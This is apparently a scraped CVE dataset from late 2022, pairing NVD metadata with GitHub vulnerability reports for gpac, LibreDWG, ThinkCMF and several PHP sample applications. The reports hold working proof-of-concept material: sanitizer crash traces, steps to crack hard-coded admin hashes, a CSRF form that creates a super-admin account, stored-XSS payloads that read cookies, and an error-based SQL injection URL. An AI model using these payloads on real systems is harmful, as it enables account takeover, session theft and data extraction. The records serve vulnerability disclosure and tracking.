/home/zw/AFL_Fuzz_Datas/gpac/src/bifs/memory_decoder.c:847:10 #10 0x7f81945c7f12 in BM_ParseCommand /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/memory_decoder.c:915:8 #11 0x7f81945c9706 in gf_bifs_flush_command_list /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/memory_decoder.c:964:9 #12 0x7f81945cc012 in gf_bifs_decode_command_list /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/memory_decoder.c:1044:3 #13 0x7f8195bc921f in gf_sm_load_run_isom /home/zw/AFL_Fuzz_Datas/gpac/src/scene_manager/loader_isom.c:303:10 #14 0x7f8195a86732 in gf_sm_load_run /home/zw/AFL_Fuzz_Datas/gpac/src/scene_manager/scene_manager.c:719:28 #15 0x577f50 in dump_isom_scene /home/zw/AFL_Fuzz_Datas/gpac/applications/mp4box/filedump.c:207:14 #16 0x53949f in mp4box_main /home/zw/AFL_Fuzz_Datas/gpac/applications/mp4box/mp4box.c:6369:7 #17 0x549801 in main /home/zw/AFL_Fuzz_Datas/gpac/applications/mp4box/mp4box.c:6834:1 #18 0x7f8192985082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-use-after-free /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/unquantize.c:175:12 in Q_IsTypeOn Shadow bytes around the buggy address: 0x0c207fff8300: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c207fff8310: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa 0x0c207fff8320: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c207fff8330: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa 0x0c207fff8340: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd =>0x0c207fff8350: fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd 0x0c207fff8360: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c207fff8370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c207fff8380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff83a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1578219==ABORTING ``` # Occurrences: [gpac/src/bifs/unquantize.c:175:12 in Q_IsTypeOn](https://github.com/gpac/gpac/blob/696e6f868f9f3e69d63908d3e4d8c34aa51e9853/src/bifs/unquantize.c#L175) # Impact can cause a program to crash, use unexpected values, or execute code. **Report of the Information Security Laboratory of Ocean University of China @OUC_ISLOUC @OUC_Blue_Whale**
Heap use after free in Q_IsTypeOn at gpac/src/bifs/unquantize.c
https://api.github.com/repos/gpac/gpac/issues/2315/comments
0
2022-11-14T01:55:34Z
2022-11-14T13:45:21Z
https://github.com/gpac/gpac/issues/2315
1,447,239,893
2,315
4,443
CVE-2022-45332
2022-11-30T03:15:13.973
LibreDWG v0.12.4.4643 was discovered to contain a heap buffer overflow via the function decode_preR13_section_hdr at decode_r11.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/524" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/524" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.4.4643:*:*:*:*:*:*:*", "matchCriteriaId": "8B1D693A-7DFD-40CC-B3E7-D2B6E5F5ADD1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/LibreDWG/libredwg/issues/524
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
**System info** Ubuntu x86_64, clang 10.0 version: 0.12.4.4643, last commit [93c2512](https://github.com/LibreDWG/libredwg/commit/93c25124c191987af168ace9fe4b5623061874bd) **Command line** ./dwg2dxf poc **Poc** poc: [poc](https://github.com/iorra-cifer/Poc/blob/main/libredwg/heap-buffer-overflow?raw=true) **AddressSanitizer output** ==4080011==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x618000000428 at pc 0x000000480860 bp 0x7ffddb1de850 sp 0x7ffddb1de008 WRITE of size 63 at 0x618000000428 thread T0 #0 0x48085f in strncpy /home/brian/src/final/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:483:5 #1 0x1123350 in decode_preR13_section_hdr /home/SVF-tools/example/libredwg-2/src/decode_r11.c:139:3 #2 0x111d7e1 in decode_preR13 /home/SVF-tools/example/libredwg-2/src/decode_r11.c:762:7 #3 0x4fb4b6 in dwg_decode /home/SVF-tools/example/libredwg-2/src/decode.c:211:17 #4 0x4c6dcc in dwg_read_file /home/SVF-tools/example/libredwg-2/src/dwg.c:254:11 #5 0x4c4a40 in main /home/SVF-tools/example/libredwg-2/programs/dwg2dxf.c:258:15 #6 0x7f7873298c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #7 0x41b649 in _start (/home/SVF-tools/example/libredwg-2/fuzz/dwg2dxf.ci+0x41b649) 0x618000000428 is located 24 bytes inside of 442820362-byte region [0x618000000410,0x61801a64eb1a) ==4080011==AddressSanitizer CHECK failed: /home/brian/src/final/llvm-project/compiler-rt/lib/asan/asan_descriptions.cpp:175 "((id)) != (0)" (0x0, 0x0) #0 0x49bf3e in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) /home/brian/src/final/llvm-project/compiler-rt/lib/asan/asan_rtl.cpp:73:5 #1 0x4b045f in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) /home/brian/src/final/llvm-project/compiler-rt/lib/sanitizer_common/sanitizer_termination.cpp:78:5 #2 0x4245db in __asan::HeapAddressDescription::Print() const /home/brian/src/final/llvm-project/compiler-rt/lib/asan/asan_descriptions.cpp #3 0x427425 in __asan::ErrorGeneric::Print() /home/brian/src/final/llvm-project/compiler-rt/lib/asan/asan_errors.cpp:591:20 #4 0x497ba8 in __asan::ScopedInErrorReport::~ScopedInErrorReport() /home/brian/src/final/llvm-project/compiler-rt/lib/asan/asan_report.cpp:141:50 #5 0x4997dd in __asan::ReportGenericError(unsigned long, unsigned long, unsigned long, unsigned long, bool, unsigned long, unsigned int, bool) /home/brian/src/final/llvm-project/compiler-rt/lib/asan/asan_report.cpp:474:1 #6 0x480881 in strncpy /home/brian/src/final/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:483:5 #7 0x1123350 in decode_preR13_section_hdr /home/SVF-tools/example/libredwg-2/src/decode_r11.c:139:3 #8 0x111d7e1 in decode_preR13 /home/SVF-tools/example/libredwg-2/src/decode_r11.c:762:7 #9 0x4fb4b6 in dwg_decode /home/SVF-tools/example/libredwg-2/src/decode.c:211:17 #10 0x4c6dcc in dwg_read_file /home/SVF-tools/example/libredwg-2/src/dwg.c:254:11 #11 0x4c4a40 in main /home/SVF-tools/example/libredwg-2/programs/dwg2dxf.c:258:15 #12 0x7f7873298c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #13 0x41b649 in _start (/home/SVF-tools/example/libredwg-2/fuzz/dwg2dxf.ci+0x41b649)
heap-buffer-overflow exists in the function decode_preR13_section_hdr in decode_r11.c
https://api.github.com/repos/LibreDWG/libredwg/issues/524/comments
1
2022-11-13T04:23:10Z
2022-11-30T12:14:12Z
https://github.com/LibreDWG/libredwg/issues/524
1,446,725,478
524
4,444
CVE-2022-44096
2022-11-30T05:15:11.187
Sanitization Management System v1.0 was discovered to contain hardcoded credentials which allows attackers to escalate privileges and access the admin panel.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upasvi/CVE-/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upasvi/CVE-/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sanitization_management_system_project:sanitization_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9FB7FB55-B294-42EB-8C91-5B0106071352", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "798" ]
798
https://github.com/upasvi/CVE-/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upasvi", "CVE-" ]
Sanitization Management System — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access Exploit Author: Upasana Bohra Vendor Homepage: https://www.sourcecodester.com/php-project Software Link: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html Tested on Windows10 Linkedln Contact: https://www.linkedin.com/in/upasana-bohra-8767b9156/ Hardcoded Credentials: Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non-encrypted) passwords and other secrets (SSH Keys, DevOps secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk. [Attack Vectors] An attacker can gain admin panel access using default credentials and do malicious activities Proof Of Concept 1 Download source code from https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html 2 Now unzip it and go to the Database folder here we can see one SQL file. 3 Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.
Sanitization Management System — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access
https://api.github.com/repos/Upasanabohra/CVE-/issues/1/comments
0
2022-10-18T06:32:33Z
2022-10-18T06:32:33Z
https://github.com/Upasanabohra/CVE-/issues/1
1,412,648,121
1
4,445
CVE-2022-44097
2022-11-30T05:15:11.257
Book Store Management System v1.0 was discovered to contain hardcoded credentials which allows attackers to escalate privileges and access the admin panel.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upasvi/CVE-/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upasvi/CVE-/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:book_store_management_system_project:book_store_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "7E1BB334-C4F4-456D-B55F-61A06A11757D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "798" ]
798
https://github.com/upasvi/CVE-/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upasvi", "CVE-" ]
Book Store Management System— Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access Exploit Author: Upasana Bohra Vendor Homepage: https://www.sourcecodester.com/php-project Software Link: https://www.sourcecodester.com/php/15748/book-store-management-system-project-using-php-codeigniter-3-free-source-code.html Tested on Windows10 Linkedln Contact: https://www.linkedin.com/in/upasana-bohra-8767b9156/ Hardcoded Credentials: Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non-encrypted) passwords and other secrets (SSH Keys, DevOps secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk. [Attack Vectors] An attacker can gain admin panel access using default credentials and do malicious activities PROOF OF CONCEPT 1 Download source code from https://www.sourcecodester.com/php/15748/book-store-management-system-project-using-php-codeigniter-3-free-source-code.html 2 Now unzip it and go to the Database folder here we can see one SQL file. 3 Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.
Book Store Management System— Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access
https://api.github.com/repos/Upasanabohra/CVE-/issues/2/comments
0
2022-10-18T07:04:27Z
2022-10-18T07:04:27Z
https://github.com/Upasanabohra/CVE-/issues/2
1,412,682,326
2
4,446
CVE-2022-40489
2022-12-01T05:15:11.730
ThinkCMF version 6.0.7 is affected by a Cross Site Request Forgery (CSRF) vulnerability that allows a Super Administrator user to be injected into administrative users.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thinkcmf/thinkcmf/issues/736" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thinkcmf/thinkcmf/issues/736" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkcmf:thinkcmf:6.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "3F02595D-FE6B-481C-87D7-E31A5C955FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/thinkcmf/thinkcmf/issues/736
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thinkcmf", "thinkcmf" ]
Hi, I found a CSRF in ThinkCMF version 6.0.7 that allows a remote user to add a Super Admin account by taking advantage of the session of an administrator who is logged into the system. Below are the steps to reproduce this issue. 1. The remote user tricks the logged in administrator into visiting a malicious site. 2. The administrator opens the page containing the CSRF payload, injecting the Super Admin user into the site. 3. The remote user takes control of the site with the credentials he injected. This is the PoC I used: ``` <html> <body> <h1>CSRF - SuperAdmin User Creation</h1> <script>history.pushState('', '', '/')</script> <form action="http://localhost/admin/user/addpost.html" method="POST"> <input type="hidden" name="user_login" value="SuperAdmin" /> <input type="hidden" name="user_pass" value="SuperAdmin999qweasd" /> <input type="hidden" name="user_email" value="superadmin&#64;yopmail&#46;com" /> <input type="hidden" name="role_id&#91;&#93;" value="2" /> <input type="hidden" name="role_id&#91;&#93;" value="1" /> <input type="submit" value="Submit request" /> </form> <script> //document.forms[0].submit(); </script> </body> </html> ``` ## Screenshots ![SuperAdminOption](https://user-images.githubusercontent.com/18688115/190211834-c756032f-39ca-4537-bd20-f5f39b637ff7.png) *Fig. 1: Vulnerable page* \ \ ![CSRFPayload](https://user-images.githubusercontent.com/18688115/190211696-b4c69809-3f30-4b9c-818d-9f0c9bfb9f25.png) *Fig. 2: CSRF Payload* \ \ ![PayloadExecuted](https://user-images.githubusercontent.com/18688115/190211742-7f03fc0c-8a1a-4ada-9301-709fe248c260.png) *Fig. 3: CSRF Payload Executed* \ \ ![SuperAdminAdded](https://user-images.githubusercontent.com/18688115/190211793-316b7aba-e9c7-4105-be97-78b0537eb44e.png) *Fig. 4: Super Admin account added* \ \ ![SuperAdminLogged](https://user-images.githubusercontent.com/18688115/190212332-6f4963a1-ea50-473b-8caf-b9d1d00a3c43.png) *Fig. 5: Super Admin logged in*
I found a CSRF that creates a Super Admin account.
https://api.github.com/repos/thinkcmf/thinkcmf/issues/736/comments
0
2022-09-14T16:45:34Z
2022-10-04T17:17:52Z
https://github.com/thinkcmf/thinkcmf/issues/736
1,373,294,253
736
4,447
CVE-2022-40849
2022-12-01T05:15:11.890
ThinkCMF version 6.0.7 is affected by Stored Cross-Site Scripting (XSS). An attacker who successfully exploited this vulnerability could inject a Persistent XSS payload in the Slideshow Management section that execute arbitrary JavaScript code on the client side, e.g., to steal the administrator's PHP session token (PHPSESSID).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thinkcmf/thinkcmf/issues/737" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thinkcmf/thinkcmf/issues/737" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkcmf:thinkcmf:6.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "3F02595D-FE6B-481C-87D7-E31A5C955FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/thinkcmf/thinkcmf/issues/737
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thinkcmf", "thinkcmf" ]
ThinkCMF version 6.0.7 is vulnerable to Stored Cross-Site Scripting. More precisely, the component that manages the slideshows allows you to insert HTML tags and JavaScript code in the Name field. Here are the steps to reproduce the issue. 1. A remote user tricks the logged in administrator into visiting a malicious site. 2. The administrator opens the page containing the CSRF payload, injecting the XSS payload into the Slideshow Management (幻灯片管理) page, in the Name (名称) field. 3. The administrator opens the Slideshow Management (幻灯片管理) page, clicks on Admin Page (管理页面) button and the stored payload is executed. Note that with this issue a remote user can steal the administrator's session cookie (PHPSESSID). These are the PoCs I used. ``` <html> <body> <h1>CSRF - XSS Stored PoC</h1> <script>history.pushState('', '', '/')</script> <form action="http://localhost/admin/slide/addPost.html" method="POST"> <input type="hidden" name="name" value="&lt;audio&#47;src&#47;onerror&#61;alert&#40;0&#41;&gt;" /> <input type="hidden" name="remark" value="XSS&#32;Stored" /> <input type="submit" value="Submit request" /> </form> <script> //document.forms[0].submit(); </script> </body> </html> ``` ``` <html> <body> <h1>CSRF - XSS Stored PoC</h1> <script>history.pushState('', '', '/')</script> <form action="http://localhost/admin/slide/addPost.html" method="POST"> <input type="hidden" name="name" value="&lt;audio&#47;src&#47;onerror&#61;alert&#40;document.cookie&#41;&gt;" /> <input type="hidden" name="remark" value="XSS&#32;Stored" /> <input type="submit" value="Submit request" /> </form> <script> //document.forms[0].submit(); </script> </body> </html> ``` ## Screenshots ![XSSPayload](https://user-images.githubusercontent.com/18688115/190218711-4f596985-9c4a-49cb-9a37-8ad8423b0af0.png) *Fig. 1: CSRF that contains an XSS payload* \ \ ![XSSPocExecuted](https://user-images.githubusercontent.com/18688115/190219014-82a983e9-93eb-4123-bbe8-26d6551f7de5.png) *Fig.2: CSRF payload triggered* \ \ ![XSSPayloadInjected](https://user-images.githubusercontent.com/18688115/190219427-eef82fe8-db4a-4bf6-b532-c4d40f4099a0.png) *Fig. 3: XSS payload injected* \ \ ![XSSPayloadExecuted](https://user-images.githubusercontent.com/18688115/190219993-7a4b8bc9-babb-4069-8278-8957039a524e.png) *Fig. 4: XSS triggered* \ \ ![XSSStoredCookieExfiltration](https://user-images.githubusercontent.com/18688115/190220124-6511b9c8-a106-4fc0-9094-9039d358b52d.png) *Fig. 5: Reading the PHPSESSID cookie*
XSS Stored in the Slideshow Management component.
https://api.github.com/repos/thinkcmf/thinkcmf/issues/737/comments
0
2022-09-14T17:27:15Z
2022-10-04T17:17:42Z
https://github.com/thinkcmf/thinkcmf/issues/737
1,373,343,106
737
4,448
CVE-2022-4247
2022-12-01T08:15:09.370
A vulnerability classified as critical was found in Movie Ticket Booking System. This vulnerability affects unknown code of the file booking.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214624.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aman05382/movie_ticket_booking_system_php/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214624" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aman05382/movie_ticket_booking_system_php/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214624" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:movie_ticket_booking_system_project:movie_ticket_booking_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1CC14F-D9F9-4E98-9CD1-69C3BECFF808", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "707" ]
707
https://github.com/aman05382/movie_ticket_booking_system_php/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aman05382", "movie_ticket_booking_system_php" ]
# Building environment:Apache2.4.49;MySQL5.7.26;PHP7.3.4 ## 1.Movie Ticket Booking System-PHP SQL injection vulnerability exists In Booking Php, from line 4 to line 12 of the code,the value of id is passed to the backend through the get request, and is assigned to the variable $id, then $id is substituted into the database for query, and the value is assigned to the variable $movieQuery, and then the query result mysqli is returned_ query, SQL error injection vulnerability ![1130sqldaima](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1130sqldaima.png) POC: ```html http://vulcinema.test/booking.php?id=3%20or%20(select%201%20from%20(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) ``` ![1130user](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1130user.png)
Movie Ticket Booking System-PHP SQL injection vulnerability exists
https://api.github.com/repos/aman05382/movie_ticket_booking_system_php/issues/1/comments
0
2022-12-01T02:06:51Z
2022-12-01T07:24:57Z
https://github.com/aman05382/movie_ticket_booking_system_php/issues/1
1,470,541,722
1
4,449
CVE-2022-4248
2022-12-01T08:15:09.470
A vulnerability, which was classified as critical, has been found in Movie Ticket Booking System. This issue affects some unknown processing of the file editBooking.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-214625 was assigned to this vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aman05382/movie_ticket_booking_system_php/issues/3" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214625" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aman05382/movie_ticket_booking_system_php/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214625" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:movie_ticket_booking_system_project:movie_ticket_booking_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1CC14F-D9F9-4E98-9CD1-69C3BECFF808", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "707" ]
707
https://github.com/aman05382/movie_ticket_booking_system_php/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aman05382", "movie_ticket_booking_system_php" ]
